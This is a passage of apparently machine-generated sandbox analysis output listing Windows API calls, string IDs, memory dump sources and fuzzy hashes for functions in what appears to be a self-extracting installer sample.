                                                              • String ID: Unable ro register file for clean-up$User canceled extraction...
                                                              • API String ID: 3188754299-368570184
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetCurrentDirectoryW.KERNELBASE(?,_^!,00000000,?,?,00215E5F), ref: 00219682
                                                              • GetLastError.KERNEL32(?,?,00215E5F), ref: 0021968C
                                                              Strings
                                                              Similarity
                                                              • API ID: CurrentDirectoryErrorLast
                                                              • String ID: _^!
                                                              • API String ID: 152501406-4042313755
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00219CA3: CreateFileW.KERNELBASE(?,?,0023BEF0,00000000,00215AE3,?,00000000,?,00000000,?,?,?,0021843A,?,40000000,00000005), ref: 00219CD2
                                                              • GetLastError.KERNEL32(?,80000000,00000007,00000003,08000080,00000000,?,?,?,?,002160C2,?,?,00000000,00000000), ref: 00219D29
                                                              • GetProcessHeap.KERNEL32(00000008,00000010,?,80000000,00000007,00000003,08000080,00000000,?,?,?,?,002160C2,?,?,00000000), ref: 00219D52
                                                              • HeapAlloc.KERNEL32(00000000,?,?,002160C2,?,?,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 00219D59
                                                              • CloseHandle.KERNEL32(000000FF,?,?,002160C2,?,?,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 00219DB2
                                                              Similarity
                                                              • API ID: Heap$AllocCloseCreateErrorFileHandleLastProcess
                                                              • String ID:
                                                              • API String ID: 3300431839-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __getptd_noexit.LIBCMT ref: 002336E0
                                                                • Part of subcall function 0022A6D5: GetLastError.KERNEL32(00000001,00000000,0022B05E,0022CE3E,00000000,?,0022DBEB,?,00000001,?,?,0022D143,00000018,00236FA0,0000000C,0022D1D8), ref: 0022A6D9
                                                                • Part of subcall function 0022A6D5: ___set_flsgetvalue.LIBCMT ref: 0022A6E7
                                                                • Part of subcall function 0022A6D5: __calloc_crt.LIBCMT ref: 0022A6FB
                                                                • Part of subcall function 0022A6D5: _DecodePointerInternal@4.G5K9HNJ7(00000000,?,0022DBEB,?,00000001,?,?,0022D143,00000018,00236FA0,0000000C,0022D1D8,?,?,?,0022A803), ref: 0022A715
                                                                • Part of subcall function 0022A6D5: GetCurrentThreadId.KERNEL32 ref: 0022A72B
                                                                • Part of subcall function 0022A6D5: SetLastError.KERNEL32(00000000,?,0022DBEB,?,00000001,?,?,0022D143,00000018,00236FA0,0000000C,0022D1D8,?,?,?,0022A803), ref: 0022A743
                                                              • __freeptd.LIBCMT ref: 002336EA
                                                                • Part of subcall function 0022A8A6: TlsGetValue.KERNEL32(?,?,002336EF,00000000,?,00233720,00000000), ref: 0022A8C7
                                                                • Part of subcall function 0022A8A6: TlsGetValue.KERNEL32(?,?,002336EF,00000000,?,00233720,00000000), ref: 0022A8D9
                                                                • Part of subcall function 0022A8A6: _DecodePointerInternal@4.G5K9HNJ7(00000000,?,002336EF,00000000,?,00233720,00000000), ref: 0022A8EF
                                                                • Part of subcall function 0022A8A6: __freefls@4.LIBCMT ref: 0022A8FA
                                                                • Part of subcall function 0022A8A6: TlsSetValue.KERNEL32(0000000E,00000000,?,002336EF,00000000,?,00233720,00000000), ref: 0022A90C
                                                              • ExitThread.KERNEL32 ref: 002336F3
                                                              Similarity
                                                              • API ID: Value$DecodeErrorInternal@4LastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 68672458-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • EnterCriticalSection.KERNEL32(00000000), ref: 00227EE9
                                                              • LeaveCriticalSection.KERNEL32(00000000), ref: 00227F09
                                                              • LeaveCriticalSection.KERNEL32(00000000), ref: 00227F29
                                                              Similarity
                                                              • API ID: CriticalSection$Leave$Enter
                                                              • String ID:
                                                              • API String ID: 2978645861-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3_catch_GS.LIBCMT ref: 0021D71D
                                                                • Part of subcall function 002218BD: __EH_prolog3_catch.LIBCMT ref: 002218C4
                                                                • Part of subcall function 0021DBF8: __EH_prolog3.LIBCMT ref: 0021DBFF
                                                              Strings
                                                              Similarity
                                                              • API ID: H_prolog3H_prolog3_catchH_prolog3_catch_
                                                              • String ID: R!
                                                              • API String ID: 1956504941-550877972
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • DialogBoxParamA.USER32(00000081,00000000,00216A56,00000000), ref: 00216A32
                                                              Strings
                                                              • Failed while running the progress dialog., xrefs: 00216A3E
                                                              Similarity
                                                              • API ID: DialogParam
                                                              • String ID: Failed while running the progress dialog.
                                                              • API String ID: 665744214-2908255965
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: [P"
                                                              • API String ID: 431132790-4034069747
                                                              • Opcode ID: fe01f139aba299424eaf0fd6a7a457a4ad6e85721e0a84230edbd3f7e5c215cd
                                                              • Instruction ID: 7c7e549e524d2d79c2f909ba3598bd74163aab832b3c787b129048b4d34750be
                                                              • Opcode Fuzzy Hash: fe01f139aba299424eaf0fd6a7a457a4ad6e85721e0a84230edbd3f7e5c215cd
                                                              • Instruction Fuzzy Hash: CBE01274610724EBDB20BF54D40A74D7AA2BB64732F504588F4956B2D1CB741960CA51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • lstrlenW.KERNEL32(?,00000000,00000000,?,?,00000000,000000FF), ref: 0021A33B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: lstrlen
                                                              • String ID: (
                                                              • API String ID: 1659193697-3887548279
                                                              • Opcode ID: 05441afb757ec7dc9914a188a38d3c4372bf04328ba3e9be3ab900b1f56c5003
                                                              • Instruction ID: eca46b4b0f75d81931a7d6e6da0c1ec830d22b87ef22ffc6a8fb288002634878
                                                              • Opcode Fuzzy Hash: 05441afb757ec7dc9914a188a38d3c4372bf04328ba3e9be3ab900b1f56c5003
                                                              • Instruction Fuzzy Hash: 92518431922219DFCB25DFA4C8817EDB7F1AF24310F1541AAE811AB251DB319EE0CF92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetFilePointer.KERNELBASE(?,?,00000000,?), ref: 0021B443
                                                              • GetLastError.KERNEL32 ref: 0021B452
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 61eb53f9a3d849496ad8faf18ffe08a34a6b07928ff8526d699765418dd7971e
                                                              • Instruction ID: 113ea89e206f6144d0f82c0da4f6236ab6dfacb546059029b27de631c7b9909e
                                                              • Opcode Fuzzy Hash: 61eb53f9a3d849496ad8faf18ffe08a34a6b07928ff8526d699765418dd7971e
                                                              • Instruction Fuzzy Hash: 17110676A10316DFCB118F99ECD45A677B4BB643247148239EA2887263C770CC65DB80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0021B2B9
                                                              • GetLastError.KERNEL32 ref: 0021B2C6
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: CreateErrorFileLast
                                                              • String ID:
                                                              • API String ID: 1214770103-0
                                                              • Opcode ID: df24bb2b12760660279a934559149784f7a4562bf19089d8458feae39b48e6a0
                                                              • Instruction ID: f6288177cfb4231df21f93069bbd4431814c2a7d8a5ca7e19d1af5f650a34b3c
                                                              • Opcode Fuzzy Hash: df24bb2b12760660279a934559149784f7a4562bf19089d8458feae39b48e6a0
                                                              • Instruction Fuzzy Hash: 6F01C436A611206FD3218B16EC08FA67BA8EB95770F254254FE19AB3D1C730EC6196D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0021B34B
                                                              • GetLastError.KERNEL32 ref: 0021B355
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastRead
                                                              • String ID:
                                                              • API String ID: 1948546556-0
                                                              • Opcode ID: 001e882b356e276abfd5ce36c8599ccaf6ddc4c28cdaa56f9c429068c450084e
                                                              • Instruction ID: e7c54954aac1f8de34d76e1fc3cf330a5deeb076777adae8d1f8dace7bd2ebcf
                                                              • Opcode Fuzzy Hash: 001e882b356e276abfd5ce36c8599ccaf6ddc4c28cdaa56f9c429068c450084e
                                                              • Instruction Fuzzy Hash: 3DF0F633D11176EBCB118F91ED085DA7AA4AF10770B114264BD14E6250D330DE20A7D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 0021B3B0
                                                              • GetLastError.KERNEL32 ref: 0021B3BA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID:
                                                              • API String ID: 442123175-0
                                                              • Opcode ID: 8fbf144a3f9c75d0bfe02e214678eb7681f0b6369df4e8bd046499a47a4f3182
                                                              • Instruction ID: 754eee8cc8882e684c76826b768a9b2d9d2f73aee45302e190e04c6773e4dcc1
                                                              • Opcode Fuzzy Hash: 8fbf144a3f9c75d0bfe02e214678eb7681f0b6369df4e8bd046499a47a4f3182
                                                              • Instruction Fuzzy Hash: 18F09633D1113AABDB12CF90ED085DA7AA4AF10774F124264BE24F7150E771DD2097D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0021A52C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00219B82
                                                              • GetLastError.KERNEL32(?,?,?,0021A52C,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 00219B8C
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 03ef399d5f1ba6fc34c2e7ac79307ff78a3037f4dca7370daddf4c7c28778405
                                                              • Instruction ID: 50b501457ac3f0f7d0c3832a2533dbbaec21fa2c65a1d5fb9453033519852d68
                                                              • Opcode Fuzzy Hash: 03ef399d5f1ba6fc34c2e7ac79307ff78a3037f4dca7370daddf4c7c28778405
                                                              • Instruction Fuzzy Hash: 7DE0923351412A7F97104F81FC09EEB3B9DEB143A0B108129FA14C5050E632DD6087D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __getptd.LIBCMT ref: 0023370B
                                                                • Part of subcall function 0022A753: __getptd_noexit.LIBCMT ref: 0022A756
                                                                • Part of subcall function 0022A753: __amsg_exit.LIBCMT ref: 0022A763
                                                                • Part of subcall function 002336DB: __getptd_noexit.LIBCMT ref: 002336E0
                                                                • Part of subcall function 002336DB: __freeptd.LIBCMT ref: 002336EA
                                                                • Part of subcall function 002336DB: ExitThread.KERNEL32 ref: 002336F3
                                                              • __XcptFilter.LIBCMT ref: 0023372C
                                                                • Part of subcall function 00229D0A: __getptd_noexit.LIBCMT ref: 00229D10
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                              • String ID:
                                                              • API String ID: 418257734-0
                                                              • Opcode ID: f009d9e842056e00792640a80d7ccdd6ae5cffe63341fbef507ab3fa1f596293
                                                              • Instruction ID: a2cb943c96cd99ccf0b80b0c133f22baa3d701d4141fdd14a2f2e3699ff6e4a8
                                                              • Opcode Fuzzy Hash: f009d9e842056e00792640a80d7ccdd6ae5cffe63341fbef507ab3fa1f596293
                                                              • Instruction Fuzzy Hash: 7AE0ECB1960604AFEB18FBE0D94AE2D7775AF45301F204089F1025B2A2CA759A60EE25
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • FindCloseChangeNotification.KERNELBASE(00000000,0022809D,00000000,00225279,?,?,?,00000000,00228585,?,00000000,?,?,000000CC,00220145), ref: 00227E25
                                                              • GetLastError.KERNEL32 ref: 00227E2F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ChangeCloseErrorFindLastNotification
                                                              • String ID:
                                                              • API String ID: 1687624791-0
                                                              • Opcode ID: a360536b466dc1ea0c2268d3460045abdc0318d426aebf441109dede154a588c
                                                              • Instruction ID: 2d69b8d51ec9df3deb2c4dfe3e4ca08d7d7669a0354ed01362dcb57b5346d4b5
                                                              • Opcode Fuzzy Hash: a360536b466dc1ea0c2268d3460045abdc0318d426aebf441109dede154a588c
                                                              • Instruction Fuzzy Hash: ECD0C9707282135BDB301FB1B90C76332E8AF24742F1648A9A982C4040EF30C8A09660
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0021B278
                                                              • RtlFreeHeap.NTDLL(00000000), ref: 0021B27F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$FreeProcess
                                                              • String ID:
                                                              • API String ID: 3859560861-0
                                                              • Opcode ID: a2e5b26c45dbd0f4d9c80874d2d404f8524b684d3fd1ef3b4de7bada964d9ba2
                                                              • Instruction ID: 9c5a67466750559c12072d6a01ef55e90fc5fdd89bcc364f0deb7783b5fa3d5b
                                                              • Opcode Fuzzy Hash: a2e5b26c45dbd0f4d9c80874d2d404f8524b684d3fd1ef3b4de7bada964d9ba2
                                                              • Instruction Fuzzy Hash: 90C0123216420977DB401FE1BC0CFE53B9C9BA0B52F144010FB0D85010DA7184F09650
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0021B25A
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0021B261
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocateProcess
                                                              • String ID:
                                                              • API String ID: 1357844191-0
                                                              • Opcode ID: f86bbe323503f2e0439665ca328b00c26d23d2f057ef1a1794588dc67ec418e0
                                                              • Instruction ID: e27c5485d7781487493baef43d795f6f92847bc33327d5f5c02d8afc5027376a
                                                              • Opcode Fuzzy Hash: f86bbe323503f2e0439665ca328b00c26d23d2f057ef1a1794588dc67ec418e0
                                                              • Instruction Fuzzy Hash: DFC04C36044248B7CA001BD1BC0DBC57E1DD795652F00C010F71D86051CE7194208651
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • #20.CABINET(0021B250,0021B26E,0021B296,0021B32B,0021B390,0021B48E,0021B3F5,000000FF,?,?,00000000,00000000), ref: 0021AD40
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 26fc4e0b644e981bb1fd53ab6baf58d6cd04c4d48395940385c72767a0821b4d
                                                              • Instruction ID: d65c3e3cc27180b09625833fe6b06cb8f1bd1593116416534c4fc6b3cf1e7ad0
                                                              • Opcode Fuzzy Hash: 26fc4e0b644e981bb1fd53ab6baf58d6cd04c4d48395940385c72767a0821b4d
                                                              • Instruction Fuzzy Hash: 83418070D2121AAFCB11DFA8E8454EEBBF0FB29710F20402AE814F7650D77489A0CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 002285CB: __EH_prolog3.LIBCMT ref: 002285D2
                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 00228879
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3ObjectSingleWait
                                                              • String ID:
                                                              • API String ID: 2100491740-0
                                                              • Opcode ID: 5b8c03cf22bb715a2396ca12529fbc241540c5578a252844104815dbab431819
                                                              • Instruction ID: 3565cf21decaedbf91fc2eb1743780e745e6860f946967f8cb37825237f74bb4
                                                              • Opcode Fuzzy Hash: 5b8c03cf22bb715a2396ca12529fbc241540c5578a252844104815dbab431819
                                                              • Instruction Fuzzy Hash: 4241623162113AABCF61DEA8E8C1B6973E1BF44300B554164ED65EF227CE30EC618B52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __CxxThrowException@8.LIBCMT ref: 0021C518
                                                                • Part of subcall function 002335E6: _malloc.LIBCMT ref: 00233600
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw_malloc
                                                              • String ID:
                                                              • API String ID: 3476970888-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0022DC3A,?,?,00000000,00000000,00000000,?,0022A700,00000001,00000214,?,0022DBEB), ref: 00231646
                                                                • Part of subcall function 0022B059: __getptd_noexit.LIBCMT ref: 0022B059
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 328603210-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __CxxThrowException@8.LIBCMT ref: 00222DBF
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw
                                                              • String ID:
                                                              • API String ID: 2005118841-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,?,0023BEF0,00000000,00215AE3,?,00000000,?,00000000,?,?,?,0021843A,?,40000000,00000005), ref: 00219CD2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __CxxThrowException@8.LIBCMT ref: 00222FD6
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw
                                                              • String ID:
                                                              • API String ID: 2005118841-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
